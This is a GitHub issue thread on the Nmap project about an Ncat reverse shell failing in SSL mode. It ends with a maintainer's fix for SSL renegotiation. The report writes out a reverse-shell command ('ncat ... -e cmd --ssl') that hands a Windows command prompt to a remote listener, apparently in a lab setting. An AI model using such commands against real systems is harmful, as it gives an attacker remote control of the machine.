New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Ncat reverse shell not working in ssl mode #1049

Closed
vinod272 opened this Issue Oct 28, 2017 · 5 comments

Comments

Projects
None yet
6 participants
@vinod272

vinod272 commented Oct 28, 2017

I have ncat listening in SSL mode in my linux box.

root@sane:~/Desktop# ncat --listen 443 --ssl -vvv
Ncat: Version 7.60 ( https://nmap.org/ncat )
Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: EAF5 2302 3E13 6E17 AEA1 0AE2 9F0B 2EB8 7F63 F291
NCAT DEBUG: Initialized fdlist with 103 maxfds
Ncat: Listening on :::443
NCAT DEBUG: Added fd 3 to list, nfds 1, maxfd 3
Ncat: Listening on 0.0.0.0:443
NCAT DEBUG: Added fd 4 to list, nfds 2, maxfd 4
NCAT DEBUG: Added fd 0 to list, nfds 3, maxfd 4
NCAT DEBUG: Initialized fdlist with 100 maxfds
NCAT DEBUG: selecting, fdmax 4

I am able to connect to this port in SSL mode from my Windows box with -e cmd option to get a reverse shell and i do get the command prompt in my linux box , but as soon as i type any command, the connection closes with the highlighted statements in my Windows box.

C:\Users\Administrator>ncat 10.11.0.64 443 -e cmd -vvv --ssl
Ncat: Version 7.60 ( https://nmap.org/ncat )
NCAT DEBUG: Using trusted CA certificates from C:\Program Files\Nmap\ca-bundle.c
rt.
NCAT DEBUG: Not doing certificate verification.
libnsock nsock_iod_new2(): nsock_iod_new (IOD #1)
libnsock nsock_connect_ssl(): SSL connection requested to 10.11.0.64:443/tcp (IO
D #1) EID 9
Ncat: Subject: CN=localhost
Ncat: Issuer: CN=localhost
Ncat: SHA-1 fingerprint: 48D4 40F5 AF93 19C8 99AA 369E CE52 F9D8 9DE1 A9D4
Ncat: Certificate verification failed (self signed certificate).
libnsock nsock_trace_handler_callback(): Callback: SSL-CONNECT SUCCESS for EID 9
[10.11.0.64:443]
Ncat: SSL connection to 10.11.0.64:443.
Ncat: SHA-1 fingerprint: 48D4 40F5 AF93 19C8 99AA 369E CE52 F9D8 9DE1 A9D4
libnsock nsock_iod_new2(): nsock_iod_new (IOD #2)
NCAT DEBUG: Executing: cmd
NCAT DEBUG: Creating named pipe "\.\pipe\ncat-1404-0"
NCAT DEBUG: Register subprocess 000000E0 at index 0.
NCAT DEBUG: Unregister subprocess 000000E0 from index 0.
NCAT DEBUG: Subprocess still running, terminating it.
NCAT DEBUG: Subprocess ended with exit code 259.
NCAT DEBUG: Terminating subprocesses
NCAT DEBUG: max_index 1


But everything works fine when not in SSL mode.

@landon8848

This comment has been minimized.

Show comment
Hide comment
@landon8848

landon8848 Nov 6, 2017

I'm seeing the same behavior. I saw this was happening in earlier versions of ncat.

#197

landon8848 commented Nov 6, 2017

I'm seeing the same behavior. I saw this was happening in earlier versions of ncat.

#197

@cldrn cldrn added the Ncat label Nov 23, 2017

@skippylafarge

This comment has been minimized.

Show comment
Hide comment
@skippylafarge

skippylafarge Feb 8, 2018

I'm also seeing this behavior. Any word on a fix or a workaround? I've read elsewhere of using --sctp instead of tcp, but that doesn't fly with Windows being involved.

skippylafarge commented Feb 8, 2018

I'm also seeing this behavior. Any word on a fix or a workaround? I've read elsewhere of using --sctp instead of tcp, but that doesn't fly with Windows being involved.

@Z3raa

This comment has been minimized.

Show comment
Hide comment
@Z3raa

Z3raa Feb 19, 2018

same issue here

Z3raa commented Feb 19, 2018

same issue here

@ghost

This comment has been minimized.

Show comment
Hide comment
@ghost

ghost Mar 2, 2018

ncat 7.60 doesn't support tls 1.2 anymore since Sep 17. But when 7.50 came in out July... it did. Download the older one from nmap to your kali boxes... or try harder by compiling your own pe. <3.

ghost commented Mar 2, 2018

ncat 7.60 doesn't support tls 1.2 anymore since Sep 17. But when 7.50 came in out July... it did. Download the older one from nmap to your kali boxes... or try harder by compiling your own pe. <3.

@dmiller-nmap

This comment has been minimized.

Show comment
Hide comment
@dmiller-nmap

dmiller-nmap Mar 11, 2018

Closing as a duplicate of #197. Thanks for reporting, though, since it got me to find and fix the bug (commit incoming).

dmiller-nmap commented Mar 11, 2018

Closing as a duplicate of #197. Thanks for reporting, though, since it got me to find and fix the bug (commit incoming).

nmap-bot pushed a commit that referenced this issue Mar 11, 2018

Do a 2nd SSL_read if necessary for renegotiation.
This fix was previously applied to ncat_listen's read_socket in r36652
(ac8b866) as a fix for #773. It didn't fully solve the problem, though,
since the fix should have been applied in ncat_core's fdinfo_recv, right
after the call to SSL_read. This commit moves the fix where it belongs,
which also simplifies the code.

Fixes #197 and #1049.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment